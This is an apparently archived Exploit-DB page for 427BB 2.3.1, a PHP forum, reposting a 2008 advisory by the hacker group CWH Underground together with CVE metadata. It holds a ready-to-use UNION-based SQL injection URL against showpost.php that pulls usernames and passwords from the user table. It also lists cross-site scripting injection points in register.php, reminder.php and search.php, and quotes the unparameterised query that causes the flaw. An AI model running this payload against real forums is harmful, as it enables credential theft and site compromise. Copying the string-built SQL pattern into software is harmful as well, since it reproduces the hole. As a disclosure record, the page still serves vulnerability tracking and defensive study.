Search...

427bb 2.3.1 sql/XSS Multiple Vulnerabilities

2008-06-05T00:00:00

ID EDB-ID:5742
Type exploitdb
Reporter CWH Underground
Modified 2008-06-05T00:00:00

Description

427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities. CVE-2008-2560,CVE-2008-2561. Webapps exploit for php platform

                                        
                                            
============================================================
 427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities
============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 4 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : 427BB
 VERSION     : 2.3.1
 DOWNLOAD    : http://fourtwosevenbb.sourceforge.net/
#####################################################

---SQL Injection Exploit [showpost.php]---

##############################################
Vulnerable: showpost.php

118: $sql = "SELECT ID, UserName, Post, UTime, IP, InReplyTo, ThreadID From " . $t_prefix . "Posts WHERE ID=$post_id";
119:
120: $res = mysql_query($sql);

###############################################

Exploit:

http://[target]/[path]/showpost.php?ForumID=1&post=1 union select 1,UserName,3,4,5,Password,7 FROM 427bb_personal WHERE ID=1--



---Multiple Remote XSS Exploit---

###########
XSS in URI
###########

Example:
     
http://[target]/[path]/register.php/&lt;XSS&gt;
http://[target]/[path]/reminder.php/&lt;XSS&gt;
http://[target]/[path]/search.php/&lt;XSS&gt;

####################
XSS with POST Method
####################

Example:

http://[target]/[path]/register.php
[-]POST variable "uname"
[-]POST variable "email"
[-]POST variable "email2"

http://[target]/[path]/reminder.php
[-]POST variable "email"

http://[target]/[path]/search.php
[-]POST variable "keywords"

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-05]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:5742", "hash": "1745d31c24e8246858e2fc4ec85dbd9b", "type": "exploitdb", "bulletinFamily": "exploit", "title": "427bb 2.3.1 sql/XSS Multiple Vulnerabilities", "description": "427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities. CVE-2008-2560,CVE-2008-2561. Webapps exploit for php platform", "published": "2008-06-05T00:00:00", "modified": "2008-06-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5742/", "reporter": "CWH Underground", "references": [], "cvelist": ["CVE-2008-2561", "CVE-2008-2560"], "lastseen": "2016-01-31T22:30:40", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-01-31T22:30:40"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2561", "CVE-2008-2560"]}], "modified": "2016-01-31T22:30:40"}, "vulnersScore": 7.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5742/", "sourceData": "\n============================================================\n 427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities\n============================================================\n\n ,--^----------,--------,-----,-------^--,\n | ||||||||| `--------' | O\t.. CWH Underground Hacking Team ..\n `+---------------------------^----------|\n `\\_,-------, _________________________|\n / XXXXXX /`| /\n / XXXXXX / `\\ /\n / XXXXXX /\\______(\n / XXXXXX / \n / XXXXXX /\n (________( \n `------'\n\nAUTHOR : CWH Underground\nDATE : 4 June 2008\nSITE : www.citec.us\n\n\n#####################################################\n APPLICATION : 427BB\n VERSION : 2.3.1\n DOWNLOAD : http://fourtwosevenbb.sourceforge.net/\n#####################################################\n\n---SQL Injection Exploit [showpost.php]---\n\n##############################################\nVulnerable: showpost.php\n\n118: $sql = \"SELECT ID, UserName, Post, UTime, IP, InReplyTo, ThreadID From \" . $t_prefix . \"Posts WHERE ID=$post_id\";\n119:\n120: $res = mysql_query($sql);\n\n###############################################\n\nExploit:\n\nhttp://[target]/[path]/showpost.php?ForumID=1&post=1 union select 1,UserName,3,4,5,Password,7 FROM 427bb_personal WHERE ID=1--\n\n\n\n---Multiple Remote XSS Exploit---\n\n###########\nXSS in URI\n###########\n\nExample:\n \nhttp://[target]/[path]/register.php/<XSS>\nhttp://[target]/[path]/reminder.php/<XSS>\nhttp://[target]/[path]/search.php/<XSS>\n\n####################\nXSS with POST Method\n####################\n\nExample:\n\nhttp://[target]/[path]/register.php\n[-]POST variable \"uname\"\n[-]POST variable \"email\"\n[-]POST variable \"email2\"\n\nhttp://[target]/[path]/reminder.php\n[-]POST variable \"email\"\n\nhttp://[target]/[path]/search.php\n[-]POST variable \"keywords\"\n\n##################################################################\n# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #\n##################################################################\n\n# milw0rm.com [2008-06-05]\n", "osvdbidlist": ["45972", "45971", "45974", "45973"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:09:26", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in 427BB 2.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO to (a) register.php, (b) reminder.php, and (c) search.php; the (2) uname, (3) email, and (4) email2 parameters to register.php; the (5) email parameter to reminder.php; and the (6) keywords parameter to search.php.", "modified": "2017-09-29T01:31:00", "id": "CVE-2008-2561", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2561", "published": "2008-06-06T18:32:00", "title": "CVE-2008-2561", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:09:26", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in showpost.php in 427BB 2.3.1 allows remote attackers to execute arbitrary SQL commands via the post parameter.", "modified": "2017-09-29T01:31:00", "id": "CVE-2008-2560", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2560", "published": "2008-06-06T18:32:00", "title": "CVE-2008-2560", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}